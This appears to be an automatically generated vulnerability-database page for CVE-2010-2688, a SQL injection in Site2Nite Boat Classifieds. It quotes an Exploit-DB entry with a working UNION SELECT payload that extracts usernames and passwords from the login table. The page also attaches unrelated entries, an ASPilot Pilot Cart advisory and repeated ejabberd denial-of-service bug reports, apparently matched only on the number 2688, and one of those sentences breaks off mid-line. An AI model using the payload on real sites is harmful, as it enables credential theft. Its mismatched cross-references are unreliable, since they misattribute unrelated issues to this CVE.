CVE-2010-2688
Published 2010-07-12
CVE-2010-2688: SQL injection vulnerability in detail.asp in Site2Nite Boat Classifieds allows remote attackers to execute arbitrary SQL commands via the ID parameter.
Priority: P3 · 43 · high · CVSS 2.0 score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.19% (64.0th percentile)
No detection rules found.
Exploit-DB
CVE-2010-4632 [HIGH] ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities (exploitdb · 2010-11-07 · CVSS 7.5)
---
# Title: [ASPilot Pilot Cart 7.3 multiple vulnerabilities]
# Date: [07.11.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3]
# CVE Reference: CVE-2008-2688 (only 1 SQL injection)
# EDB-ID: 5765 (only 1 SQL injection)
# Ariko-Security: Security Audits, Security Audit
# Advisory: 745/2010
============ { Ariko-Security - Advisory #1/11/2010 } =============
ASPilot Pilot Cart 7.3 multiple vulnerabilities
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart
# Latest version: 7.3
Vulnerability Info:
# Type: multiple SQL injections, multiple XSS, multiple iFrame injections, multiple link injections
Exploit-DB
CVE-2010-2688 Boat Classifieds - SQL Injection (exploitdb · 2010-06-22)
---
Boat Classifieds
####################################################
# Category: Boat Classifieds SQL Injection Vulnerability
# Download: http://www.site2nite.com/boat-webdesign.asp
# Author: Sangteamtham [at] hcegroup[dot]net
# Homepage: HCE group.net
####################################################
Exploit:
http://server/detail.asp?ID=999999 union select
1,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74
from tbllogin " having 1=1--
sangteamtham [at] hcegroup.net
Discovered on Fri, Jul 17, 2009
Bugzilla
[LOW] ejabberd: Remote DoS via flood of client2server messages (bugzilla · 2010-01-29)
Remotely exploitable DoS from XMPP client to ejabberd server
via flood of "client2server" messages (causing the message queue on
the server to get overloaded, leading to server crash) has been found.
Track of the incident:
https://support.process-one.net/browse/EJAB-1173
Upstream patches against v2.1:
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/configure?r1=2688&r2=2936&u&N
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/ejabberd_c2s.erl?r1=2911&r2=2936&u&N
CVE Request:
http://www.openwall.com/lists/oss-security/2010/01/29/1
Discussion:
*** This bug has been marked as a duplicate of bug 559921 ***
Bugzilla
[LOW] ejabberd: Remote DoS via flood of client2server messages (bugzilla · 2010-01-29; same report text as the entry above)
Discussion:
*** Bug 559900 has been marked as a duplicate of this bug. ***
---
*** Bug 559893 has been marked as a duplicate of this bug. ***
Bugzilla
[LOW] ejabberd: Remote DoS via flood of client2server messages (bugzilla · 2010-01-29; same report text as the entry above)
Discussion:
*** This bug has been marked as a duplicate of bug 559890 ***
Bugzilla
CVE-2010-0305 [MEDIUM] ejabberd: Remote DoS via flood of client2server messages (bugzilla · 2010-01-29 · CVSS 5.0; same report text as the entry above)
Discussion:
This issue affects the latest versions of ejabberd package, as shipped
with Fedora 11 (ejabberd-2.1.1-1.fc11) and 12 (ejabberd
References:
http://packetstormsecurity.org/1006-exploits/boatclassdetail-sql.txt
http://secunia.com/advisories/40263
http://www.exploit-db.com/exploits/13990
http://www.osvdb.org/65686
http://www.securityfocus.com/bid/41046
http://www.vupen.com/english/advisories/2010/1576
https://exchange.xforce.ibmcloud.com/vulnerabilities/59671